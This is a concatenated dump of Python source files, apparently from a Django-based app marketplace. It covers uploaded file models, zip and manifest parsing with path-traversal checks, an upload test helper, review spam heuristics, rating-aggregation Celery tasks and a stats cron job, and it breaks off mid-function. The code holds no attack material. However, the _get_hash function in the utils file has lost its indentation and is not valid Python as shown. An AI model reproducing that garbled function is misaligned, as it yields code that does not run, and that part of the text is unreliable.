        f.status = amo.STATUS_PENDING
        f.hash = f.generate_hash(upload.path)
        f.save()
        log.debug('New file: %r from %r' % (f, upload))
        # Move the uploaded file from the temp location.
        copy_stored_file(upload.path, os.path.join(version.path_prefix,
                                                   nfd_str(f.filename)))
        if upload.validation:
            FileValidation.from_json(f, upload.validation)
        return f
    def generate_hash(self, filename=None):
        """Generate a hash for a file."""
        hash = hashlib.sha256()
        with open(filename or self.file_path, 'rb') as obj:
            # Read in 1k chunks; iter()'s '' sentinel stops at EOF.
            for chunk in iter(lambda: obj.read(1024), ''):
                hash.update(chunk)
        return 'sha256:%s' % hash.hexdigest()
    def generate_filename(self, extension=None):
        """
        Files are in the format of: {app_slug}-{version}.{extension}
        """
        parts = []
        addon = self.version.addon
        # slugify drops unicode so we may end up with an empty string.
        # Apache did not like serving unicode filenames (bug 626587).
        extension = extension or '.zip' if addon.is_packaged else '.webapp'
        # Apparently we have non-ascii slugs leaking into prod :(
        # FIXME.
        parts.append(slugify(addon.app_slug) or 'app')
        parts.append(self.version.version)
        self.filename = '-'.join(parts) + extension
        return self.filename
    @property
    def file_path(self):
        # Canonical on-disk location for an enabled file.
        return os.path.join(settings.ADDONS_PATH, str(self.version.addon_id),
                            self.filename)
    @property
    def addon(self):
        # Resolve through with_deleted so files of deleted add-ons resolve.
        from addons.models import Addon
        from versions.models import Version
        version = Version.with_deleted.get(pk=self.version_id)
        return Addon.with_deleted.get(pk=version.addon_id)
    @property
    def guarded_file_path(self):
        # Location files are moved to when disabled.
        return os.path.join(settings.GUARDED_ADDONS_PATH,
                            str(self.version.addon_id), self.filename)
    def _signed(self):
        # foo.zip -> foo.signed.zip
        split = self.filename.rsplit('.', 1)
        split.insert(-1, 'signed')
        return '.'.join(split)
    @property
    def signed_file_path(self):
        return os.path.join(settings.SIGNED_APPS_PATH,
                            str(self.version.addon_id), self._signed())
    @property
    def signed_reviewer_file_path(self):
        return os.path.join(settings.SIGNED_APPS_REVIEWER_PATH,
                            str(self.version.addon_id), self._signed())
    @property
    def extension(self):
        return os.path.splitext(self.filename)[-1]
    @classmethod
    def mv(cls, src, dst, msg):
        """Move a file from src to dst."""
        try:
            if storage.exists(src):
                log.info(msg % (src, dst))
                move_stored_file(src, dst)
        except UnicodeEncodeError:
            # Logged, not raised: a bad filename shouldn't kill the caller.
            log.error('Move Failure: %s %s' % (smart_str(src), smart_str(dst)))
    def hide_disabled_file(self):
        """Move a disabled file to the guarded file path."""
        if not self.filename:
            return
        src, dst = self.file_path, self.guarded_file_path
        self.mv(src, dst, 'Moving disabled file: %s => %s')
    def unhide_disabled_file(self):
        """Move a re-enabled file back from the guarded path."""
        if not self.filename:
            return
        src, dst = self.guarded_file_path, self.file_path
        self.mv(src, dst, 'Moving undisabled file: %s => %s')
@use_master
def update_status(sender, instance, **kw):
    """Signal handler: refresh the owning add-on's status and current
    version when a File changes; on delete the deleted version is ignored.
    Skipped for fixture loads (raw) and when the add-on is gone."""
    if not kw.get('raw'):
        try:
            instance.version.addon.reload()
            instance.version.addon.update_status()
            if 'delete' in kw:
                instance.version.addon.update_version(ignore=instance.version)
            else:
                instance.version.addon.update_version()
        except models.ObjectDoesNotExist:
            pass
def update_status_delete(sender, instance, **kw):
    """post_delete variant of update_status: runs it with the 'delete'
    flag set so the deleted version is ignored."""
    return update_status(sender, instance, **dict(kw, delete=True))
# Keep the owning add-on's status/current version in sync whenever one of
# its files is saved or deleted.
models.signals.post_save.connect(
    update_status, sender=File, dispatch_uid='version_update_status')
models.signals.post_delete.connect(
    update_status_delete, sender=File, dispatch_uid='version_update_status')
@receiver(models.signals.post_delete, sender=File,
          dispatch_uid='cleanup_file')
def cleanup_file(sender, instance, **kw):
    """ On delete of the file object from the database, unlink the file from
    the file system """
    if kw.get('raw') or not instance.filename:
        return
    # Use getattr so the paths are accessed inside the try block.
    # Both the live and the guarded copies are removed if present.
    for path in ('file_path', 'guarded_file_path'):
        try:
            filename = getattr(instance, path)
        except models.ObjectDoesNotExist:
            return
        if storage.exists(filename):
            log.info('Removing filename: %s for file: %s'
                     % (filename, instance.pk))
            storage.delete(filename)
@File.on_change
def check_file(old_attr, new_attr, instance, sender, **kw):
    """on_change hook: move the file in/out of the guarded path when its
    status crosses STATUS_DISABLED, and log hash changes."""
    if kw.get('raw'):
        return
    old, new = old_attr.get('status'), instance.status
    if new == amo.STATUS_DISABLED and old != amo.STATUS_DISABLED:
        instance.hide_disabled_file()
    elif old == amo.STATUS_DISABLED and new != amo.STATUS_DISABLED:
        instance.unhide_disabled_file()
    # Log that the hash has changed.
    old, new = old_attr.get('hash'), instance.hash
    if old != new:
        try:
            addon = instance.version.addon.pk
        except models.ObjectDoesNotExist:
            addon = 'unknown'
        log.info('Hash changed for file: %s, addon: %s, from: %s to: %s' %
                 (instance.pk, addon, old, new))
class Platform(amo.models.ModelBase):
    """DB-backed platform row; display names live in amo.PLATFORMS."""
    # `name` and `shortname` are provided in amo.__init__
    # name = TranslatedField()
    # shortname = TranslatedField()
    class Meta(amo.models.ModelBase.Meta):
        db_table = 'platforms'
    def __unicode__(self):
        if self.id in amo.PLATFORMS:
            return unicode(amo.PLATFORMS[self.id].name)
        else:
            log.warning('Invalid platform')
            return ''
class FileUpload(amo.models.ModelBase):
    """Created when a file is uploaded for validation/submission."""
    uuid = UUIDField(primary_key=True, auto=True)
    path = models.CharField(max_length=255, default='')
    name = models.CharField(max_length=255, default='',
                            help_text="The user's original filename")
    hash = models.CharField(max_length=255, default='')
    user = models.ForeignKey('users.UserProfile', null=True)
    valid = models.BooleanField(default=False)
    is_webapp = models.BooleanField(default=False)
    validation = models.TextField(null=True)
    compat_with_app = models.ForeignKey(Application, null=True,
                                        related_name='uploads_compat_for_app')
    compat_with_appver = models.ForeignKey(
        AppVersion, null=True, related_name='uploads_compat_for_appver')
    task_error = models.TextField(null=True)
    objects = amo.models.UncachedManagerBase()
    class Meta(amo.models.ModelBase.Meta):
        db_table = 'file_uploads'
    def __unicode__(self):
        return self.uuid
    def save(self, *args, **kw):
        """Derive `valid` from the validation JSON, then save.

        Fix: *args/**kw are now forwarded to the parent save() -- they
        were previously dropped, silently ignoring options such as
        `using` or `update_fields`.
        """
        if self.validation:
            try:
                if json.loads(self.validation)['errors'] == 0:
                    self.valid = True
            except Exception:
                # Best-effort: a malformed blob is logged, never raised.
                log.error('Invalid validation json: %r' % self)
        super(FileUpload, self).save(*args, **kw)
    def add_file(self, chunks, filename, size, is_webapp=False):
        """Stream `chunks` to a temp file (keeping a known extension),
        hash while writing, and record path/name/hash on this row."""
        filename = smart_str(filename)
        loc = os.path.join(settings.ADDONS_PATH, 'temp', uuid.uuid4().hex)
        base, ext = os.path.splitext(amo.utils.smart_path(filename))
        if ext in EXTENSIONS:
            loc += ext
        log.info('UPLOAD: %r (%s bytes) to %r' % (filename, size, loc))
        hash = hashlib.sha256()
        with storage.open(loc, 'wb') as fd:
            for chunk in chunks:
                hash.update(chunk)
                fd.write(chunk)
        self.path = loc
        self.name = filename
        self.hash = 'sha256:%s' % hash.hexdigest()
        self.is_webapp = is_webapp
        self.save()
    @classmethod
    def from_post(cls, chunks, filename, size, is_webapp=False):
        """Alternate constructor: build and persist a FileUpload from
        posted chunks."""
        fu = FileUpload()
        fu.add_file(chunks, filename, size, is_webapp)
        return fu
    @property
    def processed(self):
        # Processed once validation has run (or it was marked valid).
        return bool(self.valid or self.validation)
class FileValidation(amo.models.ModelBase):
    """Stored validator output (raw JSON plus summary counts) for a File."""
    file = models.OneToOneField(File, related_name='validation')
    valid = models.BooleanField(default=False)
    errors = models.IntegerField(default=0)
    warnings = models.IntegerField(default=0)
    notices = models.IntegerField(default=0)
    validation = models.TextField()
    class Meta:
        db_table = 'file_validation'
    @classmethod
    def from_json(cls, file, validation):
        """Create and save a row from a raw validator JSON string;
        `valid` is derived from the error count."""
        js = json.loads(validation)
        new = cls(file=file, validation=validation, errors=js['errors'],
                  warnings=js['warnings'], notices=js['notices'])
        new.valid = new.errors == 0
        new.save()
        return new
def nfd_str(u):
    """Return *u* NFD-normalized and UTF-8 encoded.

    Non-unicode values (already-encoded bytestrings) pass through
    untouched.
    """
    if not isinstance(u, unicode):
        return u
    return unicodedata.normalize('NFD', u).encode('utf-8')
########NEW FILE########
__FILENAME__ = tasks
import logging
from django.conf import settings
from cache_nuggets.lib import Message
from celeryutils import task
from tower import ugettext as _
task_log = logging.getLogger('z.task')
@task
def extract_file(viewer, **kw):
    """Celery task: unzip `viewer`'s file so the file viewer can browse it.

    Progress is signalled via two cache Messages: a user-facing error
    message keyed on the viewer, and an 'extracting' flag keyed on the
    viewer's extraction cache key.
    """
    # This message is for end users so they'll see a nice error.
    msg = Message('file-viewer:%s' % viewer)
    msg.delete()
    # This flag is so that we can signal when the extraction is completed.
    flag = Message(viewer._extraction_cache_key())
    task_log.debug('[1@%s] Unzipping %s for file viewer.' % (
        extract_file.rate_limit, viewer))

    try:
        flag.save('extracting')  # Set the flag to a truthy value.
        viewer.extract()
    except Exception, err:
        # Only expose the raw exception text in DEBUG mode.
        if settings.DEBUG:
            msg.save(_('There was an error accessing file %s. %s.')
                     % (viewer, err))
        else:
            msg.save(_('There was an error accessing file %s.') % viewer)
        task_log.error('[1@%s] Error unzipping: %s' % (extract_file.rate_limit,
                                                       err))
    finally:
        # Always delete the flag so the file never gets into a bad state.
        flag.delete()
########NEW FILE########
__FILENAME__ = test_models
import json
import path
import amo
import amo.tests
from files.models import FileUpload
# TODO: Leave this here until unused in AMO. Update everything under mkt/ to
# use the `UploadTest` from mkt/files/tests/test_models.py.
class UploadTest(amo.tests.TestCase, amo.tests.AMOPaths):
    """
    Base for tests that mess with file uploads, safely using temp directories.
    """
    fixtures = ['applications/all_apps.json', 'base/appversion']

    def setUp(self):
        # Patch path.rename to copy so fixture files aren't moved away.
        self._rename = path.path.rename
        path.path.rename = path.path.copy
        # The validator task (post Addon upload) loads apps.json
        # so ensure it exists:
        from django.core.management import call_command
        call_command('dump_apps')

    def tearDown(self):
        # Undo the rename/copy patch from setUp.
        path.path.rename = self._rename

    def file_path(self, *args, **kw):
        return self.file_fixture_path(*args, **kw)

    def get_upload(self, filename=None, abspath=None, validation=None,
                   is_webapp=False):
        """Create a saved FileUpload from a fixture file (or `abspath`),
        attaching a canned passing validation unless one is supplied."""
        xpi = open(abspath if abspath else self.file_path(filename)).read()
        upload = FileUpload.from_post([xpi], filename=abspath or filename,
                                      size=1234)
        # Simulate what fetch_manifest() does after uploading an app.
        upload.is_webapp = is_webapp
        upload.validation = (validation or
                             json.dumps(dict(errors=0, warnings=1, notices=2,
                                             metadata={}, messages=[])))
        upload.save()
        return upload
########NEW FILE########
__FILENAME__ = utils
import hashlib
import json
import logging
import os
import re
import shutil
import stat
import StringIO
import tempfile
import zipfile
from zipfile import BadZipfile
from django import forms
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.utils.translation import trans_real as translation
from tower import ugettext as _
import amo
from amo.utils import rm_local_tmp_dir, strip_bom, to_language
log = logging.getLogger('files.utils')
SIGNED_RE = re.compile('^META\-INF/(\w+)\.(rsa|sf)$')
def get_filepath(fileorpath):
    """Get the actual file path of fileorpath if it's a FileUpload object."""
    try:
        # FileUpload objects carry their on-disk location in `.path`.
        return fileorpath.path
    except AttributeError:
        # Already a plain path: hand it back unchanged.
        return fileorpath
def get_file(fileorpath):
    """Get a file-like object, whether given a FileUpload object or a path."""
    if hasattr(fileorpath, 'path'):  # FileUpload
        return storage.open(fileorpath.path)
    if hasattr(fileorpath, 'name'):
        # Already file-like (has a .name); return it as-is.
        return fileorpath
    return storage.open(fileorpath)
class WebAppParser(object):
    """Parses a web app manifest (hosted JSON file or packaged-app zip)
    into the data dict used to create an Addon/Webapp."""

    def extract_locale(self, locales, key, default=None):
        """Return a dict mapping each locale to its value for `key`.

        For example, given:

            locales = {'en': {'foo': 1, 'bar': 2},
                       'it': {'foo': 3, 'bar': 4}}

        extract_locale(locales, 'foo') returns {'en': 1, 'it': 3}.
        Locales missing `key` get `default`.
        """
        ex = {}
        for loc, data in locales.iteritems():
            ex[loc] = data.get(key, default)
        return ex

    def get_json_data(self, fileorpath):
        """Read the raw manifest bytes (from inside a packaged-app zip, or
        straight from a hosted manifest file) and decode them to a dict."""
        path = get_filepath(fileorpath)
        if zipfile.is_zipfile(path):
            zf = SafeUnzip(path)
            zf.is_valid()  # Raises forms.ValidationError if problems.
            try:
                data = zf.extract_path('manifest.webapp')
            except KeyError:
                raise forms.ValidationError(
                    _('The file "manifest.webapp" was not found at the root '
                      'of the packaged app archive.'))
        else:
            file_ = get_file(fileorpath)
            data = file_.read()
            file_.close()

        return WebAppParser.decode_manifest(data)

    @classmethod
    def decode_manifest(cls, manifest):
        """
        Returns manifest, stripped of BOMs and UTF-8 decoded, as Python dict.
        """
        try:
            data = strip_bom(manifest)
            # Marketplace only supports UTF-8 encoded manifests.
            decoded_data = data.decode('utf-8')
        except (ValueError, UnicodeDecodeError) as exc:
            msg = 'Error parsing manifest (encoding: utf-8): %s: %s'
            log.error(msg % (exc.__class__.__name__, exc))
            raise forms.ValidationError(
                _('Could not decode the webapp manifest file.'))
        try:
            return json.loads(decoded_data)
        except Exception:
            raise forms.ValidationError(
                _('The webapp manifest is not valid JSON.'))

    def parse(self, fileorpath):
        """Parse a manifest into the Addon-creation dict (name, description,
        version, default locale, developer name, origin).

        Raises forms.ValidationError on malformed or incomplete manifests.
        """
        data = self.get_json_data(fileorpath)
        loc = data.get('default_locale', translation.get_language())
        default_locale = self.trans_locale(loc)
        locales = data.get('locales', {})
        if type(locales) == list:
            raise forms.ValidationError(
                _('Your specified app locales are not in the correct format.'))

        # Per-locale description/name, with the manifest's top-level values
        # overriding the default locale's entry.
        localized_descr = self.extract_locale(locales, 'description',
                                              default='')
        if 'description' in data:
            localized_descr.update({default_locale: data['description']})

        localized_name = self.extract_locale(locales, 'name',
                                             default=data['name'])
        localized_name.update({default_locale: data['name']})

        developer_info = data.get('developer', {})
        developer_name = developer_info.get('name')
        if not developer_name:
            # Missing developer name shouldn't happen if validation took place,
            # but let's be explicit about this just in case.
            raise forms.ValidationError(
                _("Developer name is required in the manifest in order to "
                  "display it on the app's listing."))

        return {'guid': None,
                'type': amo.ADDON_WEBAPP,
                'name': self.trans_all_locales(localized_name),
                'developer_name': developer_name,
                'description': self.trans_all_locales(localized_descr),
                'version': data.get('version', '1.0'),
                'default_locale': default_locale,
                'origin': data.get('origin')}

    def trans_locale(self, locale):
        # Expand short language codes to their canonical form first.
        return to_language(settings.SHORTER_LANGUAGES.get(locale, locale))

    def trans_all_locales(self, locale_dict):
        """Return `locale_dict` re-keyed with canonical locale codes."""
        trans = {}
        for key, item in locale_dict.iteritems():
            key = self.trans_locale(key)
            trans[key] = item
        return trans
class SafeUnzip(object):
    """zipfile wrapper that validates member names and sizes before any
    extraction is done."""

    def __init__(self, source, mode='r'):
        self.source = source
        self.info = None
        self.mode = mode

    def is_valid(self, fatal=True):
        """
        Runs some overall archive checks.
        fatal: if the archive is not valid and fatal is True, it will raise
        an error, otherwise it will return False.
        """
        try:
            zip = zipfile.ZipFile(self.source, self.mode)
        except (BadZipfile, IOError):
            if fatal:
                log.info('Error extracting', exc_info=True)
                raise
            return False

        _info = zip.infolist()

        for info in _info:
            # Reject path traversal ('..') and absolute member paths.
            if '..' in info.filename or info.filename.startswith('/'):
                log.error('Extraction error, invalid file name (%s) in '
                          'archive: %s' % (info.filename, self.source))
                # L10n: {0} is the name of the invalid file.
                raise forms.ValidationError(
                    _('Invalid file name in archive: {0}').format(
                        info.filename))

            if info.file_size > settings.FILE_UNZIP_SIZE_LIMIT:
                log.error('Extraction error, file too big (%s) for file (%s): '
                          '%s' % (self.source, info.filename, info.file_size))
                # L10n: {0} is the name of the invalid file.
                raise forms.ValidationError(
                    _('File exceeding size limit in archive: {0}').format(
                        info.filename))

        self.info = _info
        self.zip = zip
        return True

    def is_signed(self):
        """Tells us if an addon is signed."""
        # Signed when a matching (name).rsa/(name).sf pair exists in
        # META-INF; falls through (returning None) otherwise.
        finds = []
        for info in self.info:
            match = SIGNED_RE.match(info.filename)
            if match:
                name, ext = match.groups()
                # If it's rsa or sf, just look for the opposite.
                if (name, {'rsa': 'sf', 'sf': 'rsa'}[ext]) in finds:
                    return True
                finds.append((name, ext))

    def extract_from_manifest(self, manifest):
        """
        Extracts a file given a manifest such as:
            jar:chrome/de.jar!/locale/de/browser/
        or
            locale/de/browser
        """
        # NOTE(review): a manifest without ':' (the second documented form)
        # makes this unpack raise ValueError — confirm callers always pass
        # the 'type:path' form.
        type, path = manifest.split(':')
        jar = self
        if type == 'jar':
            parts = path.split('!')
            for part in parts[:-1]:
                # Recurse into nested jars, validating each layer.
                jar = self.__class__(StringIO.StringIO(jar.zip.read(part)))
                jar.is_valid(fatal=True)
            path = parts[-1]
        return jar.extract_path(path[1:] if path.startswith('/') else path)

    def extract_path(self, path):
        """Given a path, extracts the content at path."""
        return self.zip.read(path)

    def extract_info_to_dest(self, info, dest):
        """Extracts the given info to a directory and checks the file size."""
        self.zip.extract(info, dest)
        dest = os.path.join(dest, info.filename)
        if not os.path.isdir(dest):
            # Directories consistently report their size incorrectly.
            size = os.stat(dest)[stat.ST_SIZE]
            if size != info.file_size:
                log.error('Extraction error, uncompressed size: %s, %s not %s'
                          % (self.source, size, info.file_size))
                raise forms.ValidationError(_('Invalid archive.'))

    def extract_to_dest(self, dest):
        """Extracts the zip file to a directory."""
        for info in self.info:
            self.extract_info_to_dest(info, dest)

    def close(self):
        self.zip.close()
def extract_zip(source, remove=False, fatal=True):
    """Extracts the zip file. If remove is given, removes the source file.

    Returns the temp directory the archive was extracted into. Note that
    with fatal=False an invalid archive still returns the (empty) tempdir.
    """
    tempdir = tempfile.mkdtemp()

    zip = SafeUnzip(source)
    try:
        if zip.is_valid(fatal):
            zip.extract_to_dest(tempdir)
    except:
        # Clean up the temp dir before propagating validation/IO errors.
        rm_local_tmp_dir(tempdir)
        raise

    if remove:
        os.remove(source)
    return tempdir
def copy_over(source, dest):
    """Replace `dest` with a copy of the `source` tree, then remove `source`.

    An existing `dest` directory is deleted first so the copy is clean.
    """
    if os.path.isdir(dest):
        shutil.rmtree(dest)
    shutil.copytree(source, dest)
    # mkdtemp creates directories with mode 700; the webserver needs to
    # read them, so widen the copy to 755.
    mode_755 = (stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP |
                stat.S_IROTH | stat.S_IXOTH)
    os.chmod(dest, mode_755)
    shutil.rmtree(source)
def extract_xpi(xpi, path, expand=False):
    """
    If expand is given, will look inside the expanded file
    and find anything in the whitelist and try and expand it as well.
    It will do up to 10 iterations, after that you are on your own.

    It will replace the expanded file with a directory and the expanded
    contents. If you have 'foo.jar', that contains 'some-image.jpg', then
    it will create a folder, foo.jar, with an image inside.
    """
    expand_whitelist = ['.jar', '.xpi']
    tempdir = extract_zip(xpi)

    if expand:
        # Repeatedly scan for nested .jar/.xpi archives, replacing each
        # with a directory of its contents; the 10-pass cap bounds deeply
        # nested archives.
        for x in xrange(0, 10):
            flag = False
            for root, dirs, files in os.walk(tempdir):
                for name in files:
                    if os.path.splitext(name)[1] in expand_whitelist:
                        src = os.path.join(root, name)
                        if not os.path.isdir(src):
                            dest = extract_zip(src, remove=True, fatal=False)
                            if dest:
                                copy_over(dest, src)
                                flag = True
            if not flag:
                # Nothing expanded this pass; we're done.
                break

    copy_over(tempdir, path)
def parse_addon(pkg, addon=None):
    """
    pkg is a filepath or a django.core.files.UploadedFile
    or files.models.FileUpload.
    """
    # `addon` is accepted for API compatibility but unused here; parsing
    # is delegated entirely to WebAppParser.
    return WebAppParser().parse(pkg)
def _get_hash(filename, block_size=2 ** 20, hash=hashlib.md5):
"""Returns an MD5 hash for a filename."""
f = open(filename, 'rb')
hash_ = hash()
while True:
data = f.read(block_size)
if not data:
break
hash_.update(data)
return hash_.hexdigest()
def get_md5(filename, **kw):
    """Return the MD5 hex digest of `filename` (thin _get_hash wrapper)."""
    return _get_hash(filename, **kw)
########NEW FILE########
__FILENAME__ = models
from datetime import datetime, timedelta
import logging
from django.core.cache import cache
from django.db import models
import bleach
from celeryutils import task
from tower import ugettext_lazy as _
import amo.models
from translations.fields import save_signal, TranslatedField
from users.models import UserProfile
log = logging.getLogger('z.review')
class ReviewManager(amo.models.ManagerBase):

    def valid(self):
        """Get all reviews that aren't replies."""
        # Use extra because Django wants to do a LEFT OUTER JOIN.
        return self.extra(where=['reply_to IS NULL'])
class Review(amo.models.ModelBase):
    """A user review of an add-on/app, or a developer reply to one
    (rows with a non-null reply_to are replies)."""

    addon = models.ForeignKey('addons.Addon', related_name='_reviews')
    version = models.ForeignKey('versions.Version', related_name='reviews',
                                null=True)
    user = models.ForeignKey('users.UserProfile', related_name='_reviews_all')
    reply_to = models.ForeignKey('self', null=True, unique=True,
                                 related_name='replies', db_column='reply_to')

    rating = models.PositiveSmallIntegerField(null=True)
    title = TranslatedField(require_locale=False)
    body = TranslatedField(require_locale=False)
    ip_address = models.CharField(max_length=255, default='0.0.0.0')

    editorreview = models.BooleanField(default=False)
    flag = models.BooleanField(default=False)
    sandbox = models.BooleanField(default=False)

    # Denormalized fields for easy lookup queries.
    # TODO: index on addon, user, latest
    is_latest = models.BooleanField(
        default=True, editable=False,
        help_text="Is this the user's latest review for the add-on?")
    previous_count = models.PositiveIntegerField(
        default=0, editable=False,
        help_text="How many previous reviews by the user for this add-on?")

    objects = ReviewManager()

    class Meta:
        db_table = 'reviews'
        ordering = ('-created',)

    def get_url_path(self):
        return '/app/%s/ratings/%s' % (self.addon.app_slug, self.id)

    def flush_urls(self):
        # Cache URLs to purge when this review changes.
        urls = ['*/addon/%d/' % self.addon_id,
                '*/addon/%d/reviews/' % self.addon_id,
                '*/addon/%d/reviews/format:rss' % self.addon_id,
                '*/addon/%d/reviews/%d/' % (self.addon_id, self.id),
                '*/user/%d/' % self.user_id, ]
        return urls

    @classmethod
    def get_replies(cls, reviews):
        """Map review id -> its developer reply for the given reviews."""
        reviews = [r.id for r in reviews]
        qs = Review.objects.filter(reply_to__in=reviews)
        return dict((r.reply_to_id, r) for r in qs)

    @staticmethod
    def post_save(sender, instance, created, **kwargs):
        # Skip fixture ('raw') saves.
        if kwargs.get('raw'):
            return
        instance.refresh(update_denorm=created)
        if created:
            # Avoid slave lag with the delay.
            check_spam.apply_async(args=[instance.id], countdown=600)

    @staticmethod
    def post_delete(sender, instance, **kwargs):
        if kwargs.get('raw'):
            return
        instance.refresh(update_denorm=True)

    def refresh(self, update_denorm=False):
        """Recompute denormalized review fields and addon aggregates."""
        from . import tasks
        if update_denorm:
            pair = self.addon_id, self.user_id
            # Do this immediately so is_latest is correct. Use default
            # to avoid slave lag.
            tasks.update_denorm(pair, using='default')

        # Review counts have changed, so run the task and trigger a reindex.
        tasks.addon_review_aggregates.delay(self.addon_id, using='default')

    @staticmethod
    def transformer(reviews):
        # Bulk-attach user objects to avoid one query per review.
        user_ids = dict((r.user_id, r) for r in reviews)
        for user in UserProfile.objects.no_cache().filter(id__in=user_ids):
            user_ids[user.id].user = user
# Wire Review's denorm/spam hooks and translation saving to model signals;
# the dispatch_uids prevent duplicate registration on repeated imports.
models.signals.post_save.connect(Review.post_save, sender=Review,
                                 dispatch_uid='review_post_save')
models.signals.post_delete.connect(Review.post_delete, sender=Review,
                                   dispatch_uid='review_post_delete')
models.signals.pre_save.connect(save_signal, sender=Review,
                                dispatch_uid='review_translations')
# TODO: translate old flags.
class ReviewFlag(amo.models.ModelBase):
    """A flag raised on a review for moderator attention, with a reason."""

    SPAM = 'review_flag_reason_spam'
    LANGUAGE = 'review_flag_reason_language'
    SUPPORT = 'review_flag_reason_bug_support'
    OTHER = 'review_flag_reason_other'
    FLAGS = (
        (SPAM, _(u'Spam or otherwise non-review content')),
        (LANGUAGE, _(u'Inappropriate language/dialog')),
        (SUPPORT, _(u'Misplaced bug report or support request')),
        (OTHER, _(u'Other (please specify)')),
    )

    review = models.ForeignKey(Review)
    user = models.ForeignKey('users.UserProfile', null=True)
    flag = models.CharField(max_length=64, default=OTHER,
                            choices=FLAGS, db_column='flag_name')
    note = models.CharField(max_length=100, db_column='flag_notes', blank=True,
                            default='')

    class Meta:
        db_table = 'reviews_moderation_flags'
        # One flag per (review, user) pair.
        unique_together = (('review', 'user'),)

    def flush_urls(self):
        # Purge the same cached URLs as the underlying review.
        return self.review.flush_urls()
class Spam(object):
    """Tracks spam-flagged review ids in the cache, bucketed by reason.

    The cache holds a set of reason keys under 'amo:review:spam:reasons'
    and, under each reason key, the set of flagged review ids.
    """

    def add(self, review, reason):
        """Record `review` under `reason`; always returns True."""
        reason = 'amo:review:spam:%s' % reason
        # Bug fix (dead code removal): cache.get() with a default never
        # raises KeyError, so the original try/except KeyError blocks
        # around these lookups could never fire.
        reasonset = cache.get('amo:review:spam:reasons', set())
        idset = cache.get(reason, set())
        reasonset.add(reason)
        cache.set('amo:review:spam:reasons', reasonset)
        idset.add(review.id)
        cache.set(reason, idset)
        return True

    def reasons(self):
        """Return the set of reason keys recorded so far (or None)."""
        return cache.get('amo:review:spam:reasons')
@task
def check_spam(review_id, **kw):
    """Heuristically flag a review as spam: high posting volume, URLs in
    the body, or duplicated title/body across the user's recent reviews."""
    spam = Spam()
    try:
        # Read from the master DB: the review was just created and may
        # not have replicated to slaves yet.
        review = Review.objects.using('default').get(id=review_id)
    except Review.DoesNotExist:
        log.error('Review does not exist, check spam for review_id: %s'
                  % review_id)
        return

    thirty_days = datetime.now() - timedelta(days=30)
    others = (Review.objects.no_cache().exclude(id=review.id)
              .filter(user=review.user, created__gte=thirty_days))
    if len(others) > 10:
        # More than 10 reviews in 30 days looks like bulk posting.
        spam.add(review, 'numbers')
    if (review.body is not None and
        bleach.url_re.search(review.body.localized_string)):
        spam.add(review, 'urls')
    for other in others:
        if ((review.title and review.title == other.title) or
            review.body == other.body):
            spam.add(review, 'matches')
            break
########NEW FILE########
__FILENAME__ = tasks
import logging
from django.db.models import Count, Avg, F
import caching.base as caching
from celeryutils import task
from addons.models import Addon
from .models import Review
log = logging.getLogger('z.task')
@task(rate_limit='50/m')
def update_denorm(*pairs, **kw):
    """
    Takes a bunch of (addon, user) pairs and sets the denormalized fields for
    all reviews matching that pair.
    """
    log.info('[%s@%s] Updating review denorms.' %
             (len(pairs), update_denorm.rate_limit))
    using = kw.get('using')
    for addon, user in pairs:
        reviews = list(Review.objects.valid().no_cache().using(using)
                       .filter(addon=addon, user=user).order_by('created'))
        if not reviews:
            continue

        # previous_count = number of earlier reviews by this user for this
        # add-on; only the newest review keeps is_latest=True.
        for idx, review in enumerate(reviews):
            review.previous_count = idx
            review.is_latest = False
        reviews[-1].is_latest = True

        for review in reviews:
            review.save()
@task
def addon_review_aggregates(*addons, **kw):
    """Recompute total_reviews and average_rating for the given addon ids,
    then schedule a (slightly delayed) bayesian rating update."""
    log.info('[%s@%s] Updating total reviews and average ratings.' %
             (len(addons), addon_review_aggregates.rate_limit))
    using = kw.get('using')
    addon_objs = list(Addon.objects.filter(pk__in=addons))
    # addon id -> (rating average, review count) over latest valid reviews.
    stats = dict((x[0], x[1:]) for x in
                 Review.objects.valid().no_cache().using(using)
                 .filter(addon__in=addons, is_latest=True)
                 .values_list('addon')
                 .annotate(Avg('rating'), Count('addon')))
    for addon in addon_objs:
        rating, reviews = stats.get(addon.id, [0, 0])
        addon.update(total_reviews=reviews, average_rating=rating)

    # Delay bayesian calculations to avoid slave lag.
    addon_bayesian_rating.apply_async(args=addons, countdown=5)
@task
def addon_bayesian_rating(*addons, **kw):
    """Recompute the bayesian rating for the given addon ids, shrinking
    each addon's average toward the site-wide average."""
    log.info('[%s@%s] Updating bayesian ratings.' %
             (len(addons), addon_bayesian_rating.rate_limit))
    f = lambda: Addon.objects.aggregate(rating=Avg('average_rating'),
                                        reviews=Avg('total_reviews'))
    # NOTE(review): 60 * 60 * 60 is a 60-hour cache TTL — confirm this
    # wasn't meant to be 60 * 60 (one hour).
    avg = caching.cached(f, 'task.bayes.avg', 60 * 60 * 60)
    # Rating can be NULL in the DB, so don't update it if it's not there.
    if avg['rating'] is None:
        return

    mc = avg['reviews'] * avg['rating']
    for addon in Addon.objects.no_cache().filter(id__in=addons):
        if addon.average_rating is None:
            # Ignoring addons with no average rating.
            continue

        q = Addon.objects.filter(id=addon.id)
        if addon.total_reviews:
            # Weighted mean of the site average and this addon's average.
            num = mc + F('total_reviews') * F('average_rating')
            denom = avg['reviews'] + F('total_reviews')
            q.update(bayesian_rating=num / denom)
        else:
            q.update(bayesian_rating=0)
########NEW FILE########
__FILENAME__ = cron
import datetime
from celery.task.sets import TaskSet
import cronjobs
from . import tasks
@cronjobs.register
def update_monolith_stats(date=None):
    """Update monolith statistics.

    Fans out one celery subtask per registered metric, all for the given
    date (an ISO 'YYYY-MM-DD' string) or today when no date is passed.
    """
    if date:
        date = datetime.datetime.strptime(date, '%Y-%m-%d').date()
    today = date or datetime.date.today()

    jobs = [{'metric': metric,
             'date': today} for metric in tasks._get_monolith_jobs(date)]

    ts = [tasks.update_monolith_stats.subtask(kwargs=kw) for kw in jobs]
    TaskSet(ts).apply_async()
########NEW FILE########
__FILENAME__ = db
from django.db import models
import phpserialize as php
import json
class StatsDictField(models.TextField):
    """TextField holding a dict: reads legacy phpserialize rows as well as
    JSON, and always writes JSON."""

    description = 'A dictionary of counts stored as serialized php.'
    __metaclass__ = models.SubfieldBase

    def db_type(self, connection):
        return 'text'

    def to_python(self, value):
        # object case
        if value is None:
            return None
        if isinstance(value, dict):
            return value

        # string case: a leading '[' or '{' marks JSON, anything else is
        # treated as legacy phpserialize data.
        if value and value[0] in '[{':
            # JSON
